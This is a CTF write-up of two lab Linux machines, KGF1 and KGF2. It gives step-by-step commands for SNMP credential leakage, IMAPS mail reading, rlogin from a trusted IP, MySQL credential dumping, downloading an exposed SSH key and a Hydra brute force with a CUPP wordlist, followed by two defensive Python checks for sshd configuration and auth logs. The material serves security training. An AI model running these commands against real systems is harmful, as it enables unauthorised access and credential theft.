CTF WRITEUP WHITE BOX HARD

KGF — White Box Pentest Writeup

Two-machine series: KGF1 (SNMP enumeration, R-services, MySQL lateral movement) and KGF2 (SSH key exfiltration, OSINT-based password cracking, sudo escalation).

Written By: Thomas_Shelby
Difficulty: Hard
Machines: KGF1 · KGF2

KGF Machine
Machine: KGF1 + KGF2 · Hard · Linux · White Box
PART 01 — KGF1 · 10.0.0.27

KGF1 is configured on a NAT network (10.0.0.0/24). The attack chain involves multi-protocol enumeration (TCP + UDP), SNMP credential leak, IMAPS email access, R-services login, and MySQL lateral movement to a privileged user.

01_KGF1_Port_Scanning

terminal / nmap TCP
$ sudo nmap 10.0.0.27 -p- -Pn -n -sV

PORT    STATE  SERVICE
21/tcp  open   ftp
110/tcp open   pop3
143/tcp open   imap
512/tcp open   exec       (R-services)
513/tcp open   login      (R-services)
514/tcp open   shell      (R-services)
993/tcp open   ssl/imap
995/tcp open   ssl/pop3

terminal / FTP anonymous login
$ sudo nmap 10.0.0.27 -p 21 --script ftp-anon -n -Pn
[+] Anonymous FTP login allowed

$ ftp 10.0.0.27
Name: anonymous

ftp> ls -a
.main.txt    → no useful info
.secret.txt  → "Check the UDP ports"

02_KGF1_SNMP_Enumeration

terminal / UDP scan + SNMP walk
# UDP scan
$ sudo nmap -sU -F -Pn -n 10.0.0.27

68/udp   open|filtered  dhcpc
161/udp  open           snmp

# Discover community string
$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.0.0.27
[+] Community string: public

# Full SNMP walk
$ snmpwalk -v2c -c public 10.0.0.27
[+] Username and password found in SNMP string output → [REDACTED]

Note — R-Services Restriction

R-services (rlogin) only accept connections from trusted IP addresses. Without knowing the trusted IP range, we first use the SNMP credentials against IMAPS to read emails and discover the trusted IP information.

03_KGF1_IMAPS_Email_Access

terminal / openssl IMAPS
$ openssl s_client -connect 10.0.0.27:imaps

# Authenticate and read inbox
a1 LOGIN [REDACTED] [REDACTED]
a2 SELECT INBOX
a3 FETCH 1 BODY[]

[+] Email contains: new username, password + R-login trusted IP range

The email reveals the R-login trusted IP range. Assign a static IP within that range to the attacker machine's network interface before proceeding.

04_KGF1_Rlogin_and_MySQL

terminal / rlogin + mysql
# Login via R-services (from trusted IP)
$ rlogin -l [REDACTED] 10.0.0.27
Password: [REDACTED]

$ sudo -l  → No sudo privileges
$ cat .bash_history  → MySQL login command found

# MySQL enumeration
$ mysql -u garuda -p
Enter password: [REDACTED]

mysql> SHOW DATABASES;
mysql> USE passwords;
mysql> SHOW TABLES;
mysql> SELECT * FROM users;

[+] Multiple usernames and passwords retrieved from users table

# Check which database users also exist as system users
$ cat /etc/passwd
→ User 4 from the database exists as a system user

$ rlogin -l [REDACTED] 10.0.0.27
Password: [REDACTED]

$ sudo -l  → Full sudo privileges granted!
$ sudo su
# cat /root/flag.txt  ← ROOT FLAG

PART 02 — KGF2 · 10.0.0.28

KGF2 introduces a dual-SSH-port setup: port 22 enforces public-key-only auth, while port 2222 allows password auth — making it brute-forceable. The chain uses HTTP enumeration to exfiltrate an SSH private key, CUPP-based OSINT wordlist creation, Hydra brute force, and sudo escalation.

05_KGF2_Reconnaissance

terminal / nmap KGF2
$ sudo nmap -Pn -n 10.0.0.28

21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  ssh

# Check SSH auth methods per port
$ nmap -p22   10.0.0.28 --script ssh-auth-methods
→ publickey only (brute force NOT possible)

$ nmap -p2222 10.0.0.28 --script ssh-auth-methods
→ publickey + password (brute force POSSIBLE)
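The per-port difference nmap reports above is what a "Match LocalPort" block in sshd_config produces. The auditor below is an added example, not code from the write-up or the lab's own configuration: it parses a constructed sshd_config of that shape (an assumption, not the real file) and reports the effective PasswordAuthentication setting for every listening port, so a defender finds the password-enabled port before a scan does.

```python
import shlex

# Constructed sshd_config reproducing the KGF2 layout (assumption: not the
# lab's real file): port 22 is key-only, the Match block re-enables passwords on 2222.
SAMPLE_SSHD_CONFIG = """
Port 22
Port 2222
PubkeyAuthentication yes
PasswordAuthentication no
Match LocalPort 2222
    PasswordAuthentication yes
"""


def parse_sshd_config(text):
    """Split sshd_config into (ports, global_opts, match_blocks). Keywords are
    case-insensitive and the first occurrence wins, as in sshd; only the
    'Keyword value' spelling (not 'Keyword=value') is handled here."""
    ports, global_opts, match_blocks = [], {}, []
    current = None  # None in the global section, else the active Match block's opts
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, *args = shlex.split(line)
        key = key.lower()
        if key == "match":  # "Match LocalPort 2222" -> {"localport": "2222"}
            criteria = {args[i].lower(): args[i + 1] for i in range(0, len(args) - 1, 2)}
            current = {}
            match_blocks.append((criteria, current))
        elif key == "port" and current is None:
            ports.append(int(args[0]))
        else:
            (global_opts if current is None else current).setdefault(key, " ".join(args))
    return ports or [22], global_opts, match_blocks


def audit_password_auth(text):
    """Map each listening port to True when password logins are effective there.
    A Match block overrides the global section for matching connections; only
    blocks keyed purely on LocalPort can be judged statically. sshd's default is yes."""
    ports, global_opts, match_blocks = parse_sshd_config(text)
    result = {}
    for port in ports:
        value = global_opts.get("passwordauthentication", "yes")
        for criteria, opts in match_blocks:
            if criteria == {"localport": str(port)} and "passwordauthentication" in opts:
                value = opts["passwordauthentication"]
                break  # first matching Match block wins
        result[port] = value.lower() == "yes"
    return result
```

On a live host, `sshd -T -C lport=2222` prints the effective configuration for that port and is the authoritative check; dropping the Match block (or setting PasswordAuthentication no inside it) removes the brute-forceable surface.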

06_KGF2_HTTP_Enum_and_SSH_Key

terminal / FTP + HTTP enum
# FTP hint file
$ ftp 10.0.0.28
ftp> get hint.txt
Hint: check /robots.txt

# robots.txt reveals /ssh directory
$ curl http://10.0.0.28/robots.txt
Disallow: /ssh

# /ssh directory contains
http://10.0.0.28/ssh/adheera.html   → user bio / OSINT data
http://10.0.0.28/ssh/id_rsa         → private SSH key

# Download key
$ wget http://10.0.0.28/ssh/id_rsa
$ chmod 600 id_rsa
$ ssh -i id_rsa adheera@10.0.0.28

adheera@kgf2:~$ cat README.md
Hint: adheera is a sudoer — find the password

07_KGF2_OSINT_Wordlist_and_Brute_Force

The adheera.html page contains personal information about the user. CUPP (Common User Passwords Profiler) generates a targeted wordlist. Port 2222 allows password auth, so Hydra is used there — not port 22.

terminal / CUPP + Hydra
# Build OSINT-based wordlist
$ git clone https://github.com/Mebus/cupp
$ cd cupp && python3 cupp.py -i
→ Enter details from adheera.html
→ Output: adheera.txt

# Brute force port 2222 (password auth enabled)
$ hydra -l adheera -P adheera.txt ssh://10.0.0.28 -s 2222 -I

[2222][ssh] host: 10.0.0.28  login: adheera  password: [REDACTED]
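What a Hydra run like the one above leaves in the target's sshd log is a burst of "Failed password" lines followed by a single "Accepted password". This detector is an added example, not part of the write-up: it parses a constructed auth.log excerpt (assumed format, not captured from the lab), flags a source/user pair that crosses a failure threshold inside a time window, and escalates when a password success follows the burst; key-based logins are skipped since they are not what a wordlist attack can reach.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log excerpt (not captured from the lab): five password
# failures from one source in three seconds, then a success, then benign traffic.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:01 kgf2 sshd[1201]: Failed password for adheera from 10.0.0.5 port 40102 ssh2
Mar  3 10:01:01 kgf2 sshd[1203]: Failed password for adheera from 10.0.0.5 port 40104 ssh2
Mar  3 10:01:02 kgf2 sshd[1205]: Failed password for adheera from 10.0.0.5 port 40106 ssh2
Mar  3 10:01:02 kgf2 sshd[1207]: Failed password for adheera from 10.0.0.5 port 40108 ssh2
Mar  3 10:01:03 kgf2 sshd[1209]: Failed password for adheera from 10.0.0.5 port 40110 ssh2
Mar  3 10:01:03 kgf2 sshd[1211]: Accepted password for adheera from 10.0.0.5 port 40112 ssh2
Mar  3 10:30:00 kgf2 sshd[1300]: Accepted publickey for adheera from 10.0.0.9 port 50000 ssh2: RSA SHA256:constructed
Mar  3 11:00:00 kgf2 sshd[1310]: Failed password for invalid user admin from 10.0.0.7 port 41000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_auth_log(text):
    """Yield (timestamp, result, method, user, src) for each sshd auth line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog timestamps carry no year; fine for computing deltas
            yield datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["result"], m["method"], m["user"], m["src"]


def detect_password_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Return {(src, user): verdict}: 'burst' once >= threshold password
    failures fall inside one window, upgraded to 'burst_then_success' when an
    Accepted password for the same pair follows (a successful Hydra-style run)."""
    failures = defaultdict(list)  # (src, user) -> recent password-failure timestamps
    alerts = {}
    for ts, result, method, user, src in parse_auth_log(text):
        if method != "password":
            continue  # key-based logins are not guessable; ignore them
        key = (src, user)
        if result == "Failed":
            failures[key] = [t for t in failures[key] if ts - t <= window] + [ts]
            if len(failures[key]) >= threshold:
                alerts.setdefault(key, "burst")
        elif key in alerts:
            alerts[key] = "burst_then_success"
    return alerts
```

sshd does not record the local port in these lines, so the 22-versus-2222 distinction is invisible in the log; the rate of password failures per source is the signal to alert on.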

08_KGF2_Root_via_Sudo

terminal / sudo escalation
$ sudo su
Password: [REDACTED]

# whoami → root
# cd /root
# cat finalflag.txt

KGF2{4743565XXXXXXXXXXXXXXXXXXXXX7d89}  ← FINAL FLAG

09_Attack_Chain_Summary

KGF1 Chain

  1. TCP scan → FTP/IMAP/R-services
  2. FTP anon → .secret.txt → "check UDP"
  3. UDP scan → SNMP 161/udp
  4. onesixtyone → "public" community string
  5. snmpwalk → credentials leaked
  6. IMAPS openssl → email with trusted IP + new creds
  7. Static IP assigned → rlogin
  8. .bash_history → MySQL → users table
  9. User 4 → rlogin → sudo su → ROOT

KGF2 Chain

  1. Nmap → dual SSH (22 pubkey, 2222 password)
  2. FTP → hint.txt → check robots.txt
  3. robots.txt → /ssh directory
  4. /ssh/adheera.html → user OSINT data
  5. /ssh/id_rsa → private key download
  6. SSH login with private key → README.md hint
  7. CUPP with OSINT data → adheera.txt wordlist
  8. Hydra on port 2222 → password cracked
  9. sudo su → ROOT → final flag